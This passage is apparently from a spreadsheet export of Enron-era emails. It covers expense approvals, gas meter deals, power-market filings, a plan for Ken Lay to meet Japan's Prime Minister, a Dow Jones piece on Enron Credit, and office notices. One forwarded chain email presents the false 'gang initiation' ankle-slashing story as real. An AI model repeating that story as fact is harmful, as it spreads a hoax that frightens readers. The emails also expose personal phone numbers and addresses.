		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - January 18, 2001_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Michael Terraso_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: January 18, 2001_x000D_
Report Total: $2,139.56_x000D_
Amount Due Employee: $2,139.56_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:54 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/22/2001 03:46 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - Miscellaneous_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Mark A. Palmer_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: Miscellaneous_x000D_
Report Total: $524.47_x000D_
Amount Due Employee: $524.47_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 14:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott_bolton@enron.net'})</t>
  </si>
  <si>
    <t>All 3 of us can get together.=20_x000D_
_x000D_
_x000D_
=01;Let's just wait a bit -- there's just too much on_x000D_
my plate (and probably Donald's) to give it it's due. =01;How about the end=_x000D_
 of=20_x000D_
the_x000D_
month?_x000D_
|-------------------------+-------------------------+----------------------=_x000D_
---_x000D_
|_x000D_
|                         |   Jeff_Dasovich@enron.co|                      =_x000D_
  =20_x000D_
|_x000D_
|                         |   m                     |   =01; =01; =01; =01;=_x000D_
 To:          =20_x000D_
|_x000D_
|                         |                         |   Scott Bolton/Enron =_x000D_
  =20_x000D_
|_x000D_
|                         |   02/03/00 01:18 PM     |   Communications@Enro=_x000D_
n =20_x000D_
|_x000D_
|                         |                         |   Communications     =_x000D_
  =20_x000D_
|_x000D_
|                         |                         |   =01; =01; =01; =01;=_x000D_
 cc:          =20_x000D_
|_x000D_
|                         |                         |   =01; =01; =01; =01;=_x000D_
 Subject:     =20_x000D_
|_x000D_
|                         |                         |                      =_x000D_
  =20_x000D_
|_x000D_
|-------------------------+-------------------------+----------------------=_x000D_
---_x000D_
|_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
good talking to you. =01;would you like me to talk to donald and fill him i=_x000D_
n on=20_x000D_
the_x000D_
idea of the three of us working together to "get out in front" of the risk_x000D_
analysis" issues, or would you prefer to chat with him? =01;best, jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(Embedded image moved to file: pic01654.pcx)_x000D_
 - pic01654.pcx</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 04:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meter 9707</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - there is flow for 10/2 as well._x000D_
_x000D_
AL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
10/02/2000 02:23 PM_x000D_
To: Aimee Lannou/HOU/ECT@ECT_x000D_
cc: Robert Cotten/HOU/ECT@ECT _x000D_
Subject: Re: Meter 9707  _x000D_
_x000D_
I rolled this deal for day one in October only.  _x000D_
_x000D_
Bob - Please check with Vance on this deal.  Has it terminated or should it _x000D_
roll for October.  I don't think that Vance nom'd anything._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
Aimee Lannou   10/02/2000 10:49 AM_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Robert Cotten/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Meter 9707_x000D_
_x000D_
Daren - Meter 9707 has flow for Oct. 1 (1.459mmbtu).  Deal # 125786 was used _x000D_
for Sept. 2000.  Could you please extend the deal or have a new one _x000D_
created?    Thanks._x000D_
_x000D_
AL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 11:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New ECA Extending Bid Caps</t>
  </si>
  <si>
    <t>The NYISO has issued ECA20010430 extending the bid caps, which were due to_x000D_
expire at 2359 on 30 April 2001.  The letter from Bill Museler to me, and the_x000D_
ECA itself are posted on the OASIS under OASIS Notices.  This message to the _x000D_
TIE_x000D_
contains copies of those two documents, attached below._x000D_
_x000D_
(See attached file: Letter for ECA Extending Bid Caps ECA20010430.pdf)(See_x000D_
attached file: ECA Extending Bid Caps ECA20010430.pdf)_x000D_
_x000D_
 - Letter for ECA Extending Bid Caps ECA20010430.pdf_x000D_
 - ECA Extending Bid Caps ECA20010430.pdf</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kristina.mordaunt@enron.com', 'scott.sefton@enron.com', 'kevin.howard@enron.com', 'julia.h.chin@enron.com', 'joel.ephross@enron.com'})</t>
  </si>
  <si>
    <t>Raptor I Avichi</t>
  </si>
  <si>
    <t xml:space="preserve">This confirm is ready for execution._x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 00:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Ken Lay meeting with Japanese Prime Minister</t>
  </si>
  <si>
    <t xml:space="preserve">Rosie -- please check Ken's calendar.  This would be a great one to do if we _x000D_
can squeeze it in._x000D_
_x000D_
Nick -- congrats on what looks like a great new opportunity to make _x000D_
progress.  I am in all week and would love to talk to you and Joe.  If we _x000D_
can't otherwise make schedules work, call me at home after hours Houston time _x000D_
(713-621-6550)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Nicholas O'Day_x000D_
08/27/2000 10:49 PM_x000D_
To: Steven J Kean/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Ken Lay meeting with Japanese Prime Minister_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Nicholas O'Day/AP/Enron on 08/28/2000 _x000D_
12:48 PM ---------------------------_x000D_
_x000D_
_x000D_
Nicholas O'Day_x000D_
08/28/2000 12:28 PM_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: Joseph P Hirl/AP/ENRON _x000D_
_x000D_
Subject: Ken Lay meeting with Japanese Prime Minister_x000D_
_x000D_
Steve,_x000D_
_x000D_
Over the last month the Japanese regulators and Government have come to the _x000D_
realization that the electricity deregulation initiatives implemented in _x000D_
March of this year have not stimulated competition in the manner in which _x000D_
they had expected. MITI and the Government are currently examining why the _x000D_
initiatives implemented in March are falling short of expectations and _x000D_
looking to move the 2003 review forward to next year. There are currently two _x000D_
multi party committees looking at the energy sector. The ruling Liberal _x000D_
Democratic Party also has one committee looking at energy. In addition, MITI _x000D_
is in the process of forming a new advisory group comprising academics to _x000D_
consider the next stage of deregulation. _x000D_
_x000D_
As you are aware, we have been working the regulatory aspects through MITI _x000D_
and the US Government for some time now with a degree of success - in fact, _x000D_
the majority of our 12 month goals have been achieved. Recently, with the _x000D_
addition of Kimura, we have increased our level of contact with senior _x000D_
political figures in Japan._x000D_
_x000D_
Both MITI and the USG continue to seek Enron's views on issues relating to _x000D_
the current deregulation process and the way Enron wants to see electricity _x000D_
deregulation. We have recently addressed the parliamentary Deregulation _x000D_
Committee which reports to the Prime Minister and regularly provide _x000D_
educational presentations to MITI on issues relevant to deregulation. _x000D_
Further, senior political figures are now recognizing that Enron can assist _x000D_
in the deregulation process in a positive way._x000D_
_x000D_
What we appear to have in Japan in the electricity sector is a reasonably _x000D_
clean slate and the opportunity to have a major say in how things should be _x000D_
structured in the future._x000D_
_x000D_
Ken Lay's links with the Republican Presidential campaign has received media _x000D_
attention in Japan and it is believed in Government circles here that he will _x000D_
receive a cabinet position if Gov. Bush is elected. As a result, Mr Lay _x000D_
currently carries a great deal of weight in senior Government circles in _x000D_
Japan. In the period prior to the Presidential election, we have an ideal _x000D_
opportunity to get our message across at the highest levels of the Japanese _x000D_
Government through Mr Lay._x000D_
_x000D_
A meeting between Mr Lay and Prime Minister and other senior Government _x000D_
members would significantly increase Enron's profile in Japan and assist in _x000D_
conveying our vision for the next phase of deregulation._x000D_
_x000D_
If Mr Lay were to visit Japan, possibly in late October or early November, we _x000D_
would also look at coordinating the Tokyo office opening with the visit and _x000D_
arrange a number of high level commercial meetings. Prime Minister Mori and _x000D_
the US Ambassador have already expressed an interest in attending the office _x000D_
opening. _x000D_
_x000D_
Both Joe Hirl and I would like to speak with you further about the above. _x000D_
When would be a convenient time?_x000D_
_x000D_
kind regards _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 00:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CA PWR ISSUE</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Steven J Kean/NA/Enron on 08/28/2000 _x000D_
07:31 AM ---------------------------_x000D_
_x000D_
_x000D_
Gavin Dillingham@ENRON_DEVELOPMENT_x000D_
08/25/2000 05:16 PM_x000D_
To: joe Hartsoe@ENRON, Sandra McCubbin@EES, Susan Mara@EES, Paul Kaufman@ECT, _x000D_
Karen Denne@ENRON, Jeff Dasovich@EES, Mark Palmer@ENRON, James D Steffes@EES, _x000D_
Richard Shapiro@EES, Elizabeth Linnell@EES, Jeannie Mandelker@ECT, _x000D_
filuntz@aol.com, Steven J Kean/NA/Enron@Enron, Mark A Schroeder@ENRON, Peter _x000D_
Styles@ECT, Litz@luntz.com_x000D_
cc:  _x000D_
_x000D_
Subject: CA PWR ISSUE_x000D_
_x000D_
Mass. To Join N.Y., Calif In Market-based Elec Rates _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 06:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carolyn,_x000D_
_x000D_
GE is calling for the original turbine contract.  I believe I previously _x000D_
provided Lee Johnson's address.  Could you send him an original?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 11:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kam Keiser/HOU/ECT on 05/07/2001 06:06 PM _x000D_
---------------------------_x000D_
From: Sean Riordan/ENRON@enronXgate on 05/07/2001 03:30 PM_x000D_
To: Kam Keiser/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
Kam,_x000D_
_x000D_
    I don't know if they are looking for more people on this floor but a _x000D_
friend of mine, Juan Araiza, is looking for work after graduating from _x000D_
Trinity this week.  Please find his resume enclosed._x000D_
_x000D_
_x000D_
SPR_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 07:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Amerex LOI</t>
  </si>
  <si>
    <t xml:space="preserve">You are too good to me!_x000D_
_x000D_
_x000D_
_x000D_
	Bob Shults_x000D_
	01/03/2001 03:50 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Amerex LOI_x000D_
_x000D_
Trying to wish you happy holidays_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 01/03/2001 03:42 PM_x000D_
To: Bob Shults/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Amerex LOI  _x000D_
_x000D_
You're relentless...!!!_x000D_
_x000D_
_x000D_
_x000D_
	Bob Shults_x000D_
	01/03/2001 03:23 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Amerex LOI_x000D_
_x000D_
Attached is a marked up loi for Amerex.  Can you compare to the Power _x000D_
merchant agreement and get mark to approve?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 12:47:25 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for sabra.l.dinari@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a data approver. Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000082441&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000082441_x000D_
Request Create Date : 2/6/02 2:47:23 PM_x000D_
Requested For       : sabra.l.dinari@enron.com_x000D_
Resource Name       : Sitara Houston Production Central Edit Logistics_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 01:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vance.meyer@enron.com', 'habiba.bayi@enron.com', 'mark.palmer@enron.com', 'eric.thode@enron.com', 'karen.denne@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Enron Credit US Media Update</t>
  </si>
  <si>
    <t xml:space="preserve">We had very successful media briefings in the US last week for Enron Credit._x000D_
Overall, the meetings and site demos were a huge success and all of the _x000D_
reporters seemed_x000D_
to genuinely benefit from the site demo of Enron Credit.  Below is a quick_x000D_
recap of John Sherriff's and Jeff Kinneman's media briefing schedules, as_x000D_
well as some additional notes and an article resulting from one of the_x000D_
demos._x000D_
_x000D_
_x000D_
John Sherriff held briefings with reporters from the following publications:_x000D_
_x000D_
DerivativesWeek_x000D_
Dow Jones_x000D_
Fortune Magazine_x000D_
Bondweek_x000D_
Investor's Business Daily_x000D_
Financial Times_x000D_
BusinessWeek_x000D_
_x000D_
Jeff Kinneman held briefings with reporters from the following publications:_x000D_
_x000D_
Risk Magazine_x000D_
Institutional Investor_x000D_
Wall Street &amp; Technology_x000D_
Derivatives Strategy_x000D_
Pensions &amp; Investments_x000D_
Power Finance &amp; Risk_x000D_
_x000D_
_x000D_
We are already beginning to see results based on the demos.  As you know, Dow _x000D_
Jones wrote_x000D_
a story on Enron Credit following the site demo; the article appeared on_x000D_
April 4, 2001. It is pasted below for your review. CFO.com also ran a story _x000D_
on Enron Credit last week._x000D_
In the next few weeks we expect to see stories in Bondweek, BusinessWeek,_x000D_
DerivativesWeek and Derivatives Strategy._x000D_
_x000D_
I will keep you posted on the European Briefings as well._x000D_
_x000D_
Thanks- Meredith _x000D_
_x000D_
Enron Turns Internal Credit-Risk Tool Into New Product_x000D_
By Christina Cheddar_x000D_
_x000D_
08:15 ET_x000D_
Dow Jones News Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
Of DOW JONES NEWSWIRES_x000D_
_x000D_
  (This report was originally published late Wednesday.)_x000D_
_x000D_
NEW YORK (Dow Jones)--With the number of corporate bankruptcies on the rise,_x000D_
knowing the creditworthiness of one's customers is becoming more and more_x000D_
important._x000D_
For Enron Corp. (ENE), the world's largest energy trading company, keeping_x000D_
track of credit risk has always been part of doing business. That became_x000D_
even more true with the company's launch of EnronOnline, its Internet-based_x000D_
commodities trading network._x000D_
In order to deal with the accelerated volume and speed of transactions on_x000D_
EnronOnline, the company developed a tool to help its own commercial traders_x000D_
manage the credit risk._x000D_
Early last year, Enron rolled out this tool, Enron Credit, on a limited_x000D_
basis. Gradually, the company expanded its use and scope. Last month, the_x000D_
company re-launched Enron Credit in its current format._x000D_
Enron Credit tracks more than 10,000 companies, giving each a rating known_x000D_
as the "Enron cost of credit ." The rating is expressed as an interest rate._x000D_
_x000D_
The Web site also provides news, a company's expected chance of bankruptcy_x000D_
and other related information._x000D_
While much of this information is free to registered users, Enron also has_x000D_
turned the product into a new revenue stream._x000D_
Users may download data into a spreadsheet and receive periodic updates for_x000D_
a fee._x000D_
The site also can sell a user a "digital bankruptcy swap," which is a way to_x000D_
hedge against credit exposure._x000D_
The price of the swap is determined by a rating Enron's staff assigns to a_x000D_
company and the amount of credit exposure a company needs to protect_x000D_
against._x000D_
For a supplier, the main advantage of a swap is that if a customer is unable_x000D_
to pay due to bankruptcy, the supplier will be paid immediately._x000D_
According to Enron Europe President John Sherriff, the goal of Enron Credit_x000D_
is to create a more efficient credit market by increasing trading liquidity._x000D_
_x000D_
The tool is important because "in just a short amount of time, a company's_x000D_
credit can go from stellar to bad literally overnight."_x000D_
At present, some analysts haven't factored in revenue from Enron Credit into_x000D_
their earnings models. However, as the commodity markets Enron trades in_x000D_
mature, it is possible the need for products such as Enron Credit could_x000D_
increase._x000D_
-By Christina Cheddar, Dow Jones Newswires; 201-938-5166;_x000D_
christina.cheddar@dowjones.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">    NO STAFF MEETING TODAY, JUNE 30, 2000_x000D_
      HAPPY  HOLIDAY_x000D_
_x000D_
This is a reminder !!!!!  There will NOT be a Friday Meeting June 30, 2000._x000D_
_x000D_
     _x000D_
    Date:  Friday June 30, 2000_x000D_
_x000D_
    Time:  2:30 pm - 4:30 pm_x000D_
_x000D_
    Location: 30C1  _x000D_
 _x000D_
    Topic:   Combined Staff and Budget Meeting_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
If you have any questions or conflicts, please feel free to call me (3-0643) _x000D_
or Bev (3-7857)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 05:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Corp. Board Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Add Alan Aronowitz, John Novak and Mark Taylor.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Rebecca Carter@ENRON_x000D_
	Sent by: Kelly Johnson@ENRON_x000D_
	03/26/2001 09:51 AM_x000D_
	Please respond to kelly.johnson_x000D_
		 _x000D_
		 To: John Ale/HOU/AZURIX@AZURIX, Charles Cheek/Enron@EnronXGate, James _x000D_
Derrick/Enron@EnronXGate, Mark Evans/Legal/LON/ECT@ECT, Mark E _x000D_
Haedicke/HOU/ECT@ECT, Elizabeth Labanowski/Enron@EnronXGate, _x000D_
mmanly@newpower@EES, Jordan Mintz/HOU/ECT@ECT, Michael P _x000D_
Moran/Enron@EnronXGate, Kristina Mordaunt/Enron Communications@Enron _x000D_
Communications, Eric Newell/EWC/Enron@ENRON, Janet Place/NPNG/Enron@ENRON, _x000D_
Rex Rogers/Enron@EnronXGate, Molly Sample/Houston/Eott@Eott, Vicki _x000D_
Sharp/HOU/EES@EES, Stephen Wallace/Enron@EnronXGate, Rob _x000D_
Walls/ENRON@enronXgate, Karen Lewis/ENRON@enronxgate_x000D_
		 cc: Diana Jebousek/HOU/AZURIX@AZURIX, Michelle Lawless/Enron@EnronXGate, _x000D_
Stephanie Harris/Enron@EnronXGate, Tracy Foy/LON/ECT@ECT, Betsy _x000D_
Raybon/Enron@EnronXGate, Theresa Connor-Smith/NYC/MGUSA@MGUSA, Darlene C _x000D_
Forsyth/Enron@EnronXGate, Robin Jordan/Enron Communications@Enron _x000D_
Communications, Elaine Esparza/EWC/Enron@ENRON, Connie _x000D_
Alvis/NPNG/Enron@ENRON, Sharon Morgan/Enron@EnronXGate, Autumn _x000D_
Cartier/Houston/Eott@Eott, Leasa Lopez/HOU/EES@EES, Lisa M _x000D_
Kumbalek/Enron@EnronXGate, Debra Hicks/Enron@EnronXGate_x000D_
		 Subject: Enron Corp. Board Meeting_x000D_
_x000D_
We would like to add key legal personnel to the distribution list for _x000D_
deadline dates in connection with the Enron Corp. Board of Directors meeting _x000D_
on May 1st. Please reply via email and will we update our records accordingly._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
cc: Via Facsimile_x000D_
_x000D_
 Alvin Alexanderson_x000D_
 Karen Lewis_x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 12:48:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'texasexeschapters@alumni.utexas.edu'})</t>
  </si>
  <si>
    <t>frozenset({'dgiron@alumni.utexas.net'})</t>
  </si>
  <si>
    <t>COME EARLY, BE LOUD, STAY LATE</t>
  </si>
  <si>
    <t>tEXas tailgatES talk_x000D_
_x000D_
The Longhorns have accepted a bid to the Holiday Bowl_x000D_
to play the Washington Huskies. We are off to San Diego._x000D_
Expect the information on the tailgate, travel packages_x000D_
from the Flying Longhorns and other activities in the_x000D_
next day or so. I will send along the regular email in_x000D_
a day or so as well._x000D_
_x000D_
Trey McLean_x000D_
_x000D_
http://www.TexasExes.org</t>
  </si>
  <si>
    <t>Thu, 18 Nov 1999 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Packing suggestions</t>
  </si>
  <si>
    <t>t-shirts &amp; bathing suits (daytime)_x000D_
polo/surf shirts &amp; shorts (evening wear)_x000D_
beach towel (you may want to wait &amp; buy this down there)_x000D_
boat shoes or sneakers_x000D_
sunglasses (polarized are best)_x000D_
prescription medication_x000D_
sunscreen!_x000D_
books_x000D_
music CDs_x000D_
camera &amp; film_x000D_
snorkel mask &amp; fins (your own will be better than the ones that come with the _x000D_
boat - give us your shoe size if you're not bringing your own)_x000D_
a few zip-lock bags may come in handy for packing wet items_x000D_
waterproof wallet is good to take along some $ if you decide to swim from _x000D_
boat to shore instead of taking dinghy_x000D_
_x000D_
The Moorings should be able to tell you how to get from the USVI to their _x000D_
base on Tortola.  It may be either a combination of ferry to West End (aka _x000D_
Soper's Hole) Tortola and then a cab to the base in Road Town or a ferry _x000D_
straight to Road Town.  I don't really know.  I'm also no help on how often _x000D_
they run or how long they take.  If you can be at the Moorings by 11 or 11:30 _x000D_
Sunday morning that would be perfect._x000D_
_x000D_
Do you have contact info for your hotel in St. Thomas?</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 05:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.rance@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'rosalyn.lum@enron.com', 'kristi.fredericks@enron.com', 'lisa.best@enron.com', 'tammy.barta@enron.com', 'laynie.east@enron.com', 'stacy.hardy@enron.com', 'dana.davis@enron.com', 'ashley.worthing@enron.com', 'lisa.king@enron.com'})</t>
  </si>
  <si>
    <t>FW: *URGENT*...gang initiation info; please read!!!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan Rance/NA/Enron on 11/27/2000 01:26 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sara Weaver @ EES                           11/27/2000 11:04 AM_x000D_
	_x000D_
_x000D_
To: Analysts 2000, Michelle Gross/HOU/EES@EES, Brooklyn Couch/HOU/EES@EES, _x000D_
Amanda Boettcher/HOU/EES@EES, Anate Kor/HOU/EES@EES, Sonia _x000D_
Garcia/HOU/EES@EES, Dulle, Kate, Judy Dyer/HOU/EES@EES, Ana _x000D_
Agudelo/HOU/EES@EES_x000D_
cc:  _x000D_
_x000D_
Subject: FW: *URGENT*...gang initiation info; please read!!!_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sara Weaver/HOU/EES on 11/27/2000 10:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Cathy Pham_x000D_
11/27/2000 10:55 AM_x000D_
To: lt930@yahoo.com, NganHaBui@yahoo.com, Sara Weaver/HOU/EES@EES, Sonia _x000D_
Perez/HOU/EES@EES, Quyen Nguyen/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: FW: *URGENT*...gang initiation info; please read!!!_x000D_
_x000D_
_x000D_
&gt; IMPORTANT MESSAGE FOR SAFETY FROM THE DIRECTOR OF_x000D_
&gt; TRAINING AT THE US ARMYMILITARY POLICE SCHOOL_x000D_
&gt; PLEASE TAKE TIME TO READ AND PASS ALONG !_x000D_
&gt;_x000D_
&gt; A friend stopped at a pay-at-the-pump gas station to get gas._x000D_
&gt; Once she filled her gas tank after paying at the pump and started_x000D_
&gt; to leave the attendant inside came over the speaker. He told her that_x000D_
&gt; something happened with her card and that she needed to come inside to_x000D_
&gt; pay._x000D_
&gt;_x000D_
&gt; The lady was confused because the transaction showed complete and_x000D_
&gt; approved._x000D_
&gt; She told him that and was getting ready to leave but the attendant once_x000D_
&gt; again_x000D_
&gt; urged her to come in to pay or else. She proceeded to go inside and_x000D_
&gt; started arguing with the_x000D_
&gt; attendant about his threat._x000D_
&gt;_x000D_
&gt; He told her to calm down and listen carefully:_x000D_
&gt; He told her that while she was pumping gas, a guy_x000D_
&gt; slipped into the back seat of her car on the other side and he had called_x000D_
&gt; the_x000D_
&gt; police. She immediately became scared and looked out there in time to see_x000D_
&gt; her car door open and the guy slip out._x000D_
&gt;_x000D_
&gt; The report is that the new gang initiation thing is to bring back a_x000D_
&gt; woman's body part._x000D_
&gt; One way they are doing this is crawling under girls/women's cars  while_x000D_
&gt; they're_x000D_
&gt; pumping gas or at grocery stores in the night time. Then they are cutting_x000D_
&gt; the lady's_x000D_
&gt; ankles to disable them in  order to kidnap them, kill and dismember them._x000D_
&gt; The other way is slipping into unattended cars and kidnapping the women to_x000D_
&gt; kill and_x000D_
&gt; dismember them._x000D_
&gt;_x000D_
&gt; Please pass this on to other women, young and old alike. BE extra careful_x000D_
&gt; going to and from your car at night. If at all possible, don't go alone!_x000D_
&gt; This is real!!_x000D_
&gt;_x000D_
&gt; The message:_x000D_
&gt; 1. ALWAYS lock your car doors, even if you're gone_x000D_
&gt; for just second._x000D_
&gt; 2. Check underneath your car when approaching it_x000D_
&gt; for reentry, and check in the back before getting in._x000D_
&gt; 3. Always be aware of your surroundings and other_x000D_
&gt; individuals in your  general vicinity, particularly at night!_x000D_
&gt;_x000D_
&gt; Send this to your friends so as many females as possible can be made_x000D_
&gt; aware of this new threat, and so your friend will not be the next victim._x000D_
&gt;_x000D_
&gt; Thanks,_x000D_
&gt; Barbara Baker, Secretary_x000D_
&gt; Directorate of Training_x000D_
&gt; US Army Military Police School_x000D_
&gt; (573) 563-8043_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 09:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jdaigh@utilicorp.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">John:_x000D_
Here is the '01 Operating Budget.  Please let me know if you have any more _x000D_
questions.  Thanks!_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 05:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sstoness@enron.com', 'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'mday@gmssr.com', 'leslie.lawner@enron.com', 'tjohnso8@enron.com', 'susan.j.mara@enron.com', 'james_d_steffes@enron.com'})</t>
  </si>
  <si>
    <t>Protest of PG&amp;E's  Advice Filing on Schedule E-Gen (replacement f_x000D_
	or Schedule PX)</t>
  </si>
  <si>
    <t>Attached is a draft of Enron's protest of PG&amp;E Advice Filing 2010-E which_x000D_
replaces Schedule PX with Schedule E-Gen.  The protest follows the same_x000D_
lines as our protest of SCE's advice filing  last week. The only real_x000D_
difference is that PG&amp;E would apparently give a credit which reflects all of_x000D_
a bundled customers generation costs -- i.e., retained generation (including_x000D_
QF and purchase power contracts), ISO charges and DWR costs. Therefore we_x000D_
did not have to include a section advocating that as the back up to our_x000D_
market based credit._x000D_
_x000D_
The protest is due tomorrow (May 1).  Please provide all comments as soon as_x000D_
possible._x000D_
_x000D_
 &lt;&lt;X24055.DOC&gt;&gt;_x000D_
_x000D_
Jeanne Bennett_x000D_
_x000D_
 - X24055.DOC</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 14:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Direct Canada</t>
  </si>
  <si>
    <t>Louise, with Pope's departure, I need to find someone to run Enron Direct Canada. I will do it in the interim, but it needs someone full-time - driving the business. I wanted to get your thoughts re approaching Dave Forrester. I understand (from Pope) that Dave may have an interest in returning to Calgary._x000D_
_x000D_
Regards_x000D_
Milnthorp</t>
  </si>
  <si>
    <t>Historical Curves</t>
  </si>
  <si>
    <t xml:space="preserve">Here's the file from Jeff.  _x000D_
---------------------- Forwarded by Robin Rodrigue/HOU/ECT on 03/05/2001 _x000D_
04:21 PM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey C Gossett_x000D_
03/05/2001 04:22 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Historical Curves_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 06:41:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>(01-356) Spot Month Procedures on the Eve of First Notice Day</t>
  </si>
  <si>
    <t>Notice No. 01-356_x000D_
October 26, 2001_x000D_
_x000D_
_x000D_
_x000D_
TO:		All COMEX Division Members/Member Firms_x000D_
All COMEX Division Clearing Members_x000D_
All COMEX Division Floor Traders_x000D_
All COMEX Division Operations Managers_x000D_
_x000D_
FROM:	Michael Campanelli, Vice President_x000D_
		Floor Operations, COMEX Division_x000D_
_x000D_
RE:		Spot Month Procedures on the Eve of First Notice Day_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
---------------------------------------------_x000D_
_x000D_
Please be reminded that Wednesday, October 31, 2001, is the First Notice_x000D_
Day, for the Gold, Silver, Copper and Aluminum futures delivery month of_x000D_
November 2001 (the new spot month)._x000D_
_x000D_
